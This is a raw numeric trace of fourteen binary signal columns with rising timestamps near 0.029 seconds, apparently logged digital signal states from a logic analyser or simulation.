1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158576e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158604e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158628e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158652e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158676e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158752e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158776e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158804e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158828e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158852e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158876e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158900e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9158908e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,2.9283648e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,2.9283860e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,2.9283884e-02 0,1,1,1,0,1,0,0,0,1,0,1,0,1,2.9283916e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,2.9283936e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,1,2.9284268e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,2.9284292e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.9284300e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.9284316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.9284340e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.9284364e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.9284392e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.9284416e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.9284444e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.9284468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.9284492e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.9284516e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.9284540e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9284544e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9284568e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9284592e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9284616e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9284644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9284692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9284716e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9284724e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9284740e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9284764e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9284820e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9284844e-02 0,1,1,1,0,1,0,0,0,0,0,0,0,0,2.9284848e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9284852e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9284868e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9284892e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9284916e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9284940e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9284964e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9284988e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285012e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285036e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285064e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285092e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285116e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285140e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285164e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285188e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285216e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285240e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285264e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285340e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9285348e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9285388e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9285412e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285420e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285440e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285464e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285516e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285540e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285564e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285588e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285612e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285640e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285664e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285740e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285764e-02 0,1,1,1,0,0,0,0,0,1,0,0,0,0,2.9285768e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9285772e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9285812e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9285840e-02 0,1,1,1,0,1,0,0,0,0,0,0,0,0,2.9285844e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285848e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285864e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285892e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285916e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285940e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9285964e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9285988e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286012e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286040e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286064e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286092e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286116e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286140e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286164e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286188e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286212e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286236e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286264e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286340e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286364e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9286372e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9286388e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9286412e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286420e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286440e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286464e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286516e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286540e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286564e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286588e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286612e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286640e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286664e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286740e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286764e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286788e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286816e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286840e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286864e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286916e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286940e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9286964e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9286992e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287016e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287044e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287064e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287092e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287116e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287140e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287164e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287192e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287216e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287264e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9287292e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9287316e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9287340e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9287392e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9287420e-02 0,1,1,1,0,1,0,0,0,0,0,0,0,0,2.9287424e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287428e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287444e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287468e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287516e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287540e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287564e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287592e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287616e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287644e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287668e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287740e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287764e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287792e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287816e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287844e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287868e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287916e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9287940e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9287964e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9287972e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9288020e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9288044e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288052e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288068e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288092e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288116e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288140e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288164e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288192e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288216e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288244e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288268e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288340e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288364e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288392e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288416e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288444e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288492e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288516e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288540e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288564e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288592e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288616e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288668e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288692e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288716e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288740e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288764e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288792e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288816e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288844e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288868e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288892e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288916e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288940e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9288964e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9288992e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289016e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289044e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289064e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289092e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289116e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289140e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289164e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289188e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289216e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289236e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289264e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289340e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289364e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289388e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289412e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289440e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289464e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289492e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289516e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289540e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289564e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289588e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289612e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289640e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289664e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289688e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289716e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289740e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289764e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289788e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289812e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289836e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289864e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289892e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289916e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289940e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9289964e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9289988e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290012e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290040e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290064e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290092e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290116e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290140e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290164e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290188e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290212e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290240e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290264e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290288e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290340e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290364e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290388e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290412e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290436e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290464e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290492e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290516e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290540e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290564e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290588e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290612e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290640e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290664e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290692e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290716e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290740e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290764e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9290792e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9290816e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9290844e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,2.9415616e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,2.9415820e-02 1,1,1,1,0,1,0,0,0,1,0,1,0,1,2.9415844e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,2.9415876e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,1,2.9416188e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,2.9416212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.9416220e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.9416240e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.9416260e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.9416284e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.9416316e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.9416340e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.9416364e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.9416388e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.9416412e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.9416440e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9416448e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9416460e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9416488e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9416516e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9416540e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9416564e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9416572e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9416588e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9416612e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9416620e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9416640e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9416660e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9416668e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9416716e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9416740e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9416748e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9416764e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9416788e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9416812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9416840e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9416860e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9416888e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9416916e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9416940e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9416988e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417012e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9417060e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417088e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9417140e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417164e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9417216e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417240e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9417264e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417292e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9417316e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417340e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9417344e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9417388e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9417412e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417420e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9417440e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417464e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9417516e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417540e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9417588e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417612e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9417668e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417692e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9417716e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417740e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9417764e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417788e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9417840e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417864e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9417868e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9417916e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9417940e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9417948e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9417988e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418012e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418068e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418092e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418116e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418140e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418164e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418188e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418240e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418264e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418292e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418316e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418340e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418364e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418388e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418440e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418464e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9418468e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9418492e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9418516e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418524e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418540e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418564e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418588e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418612e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418668e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418692e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418716e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418740e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418788e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418812e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418860e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418888e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418940e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9418964e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9418988e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419012e-02 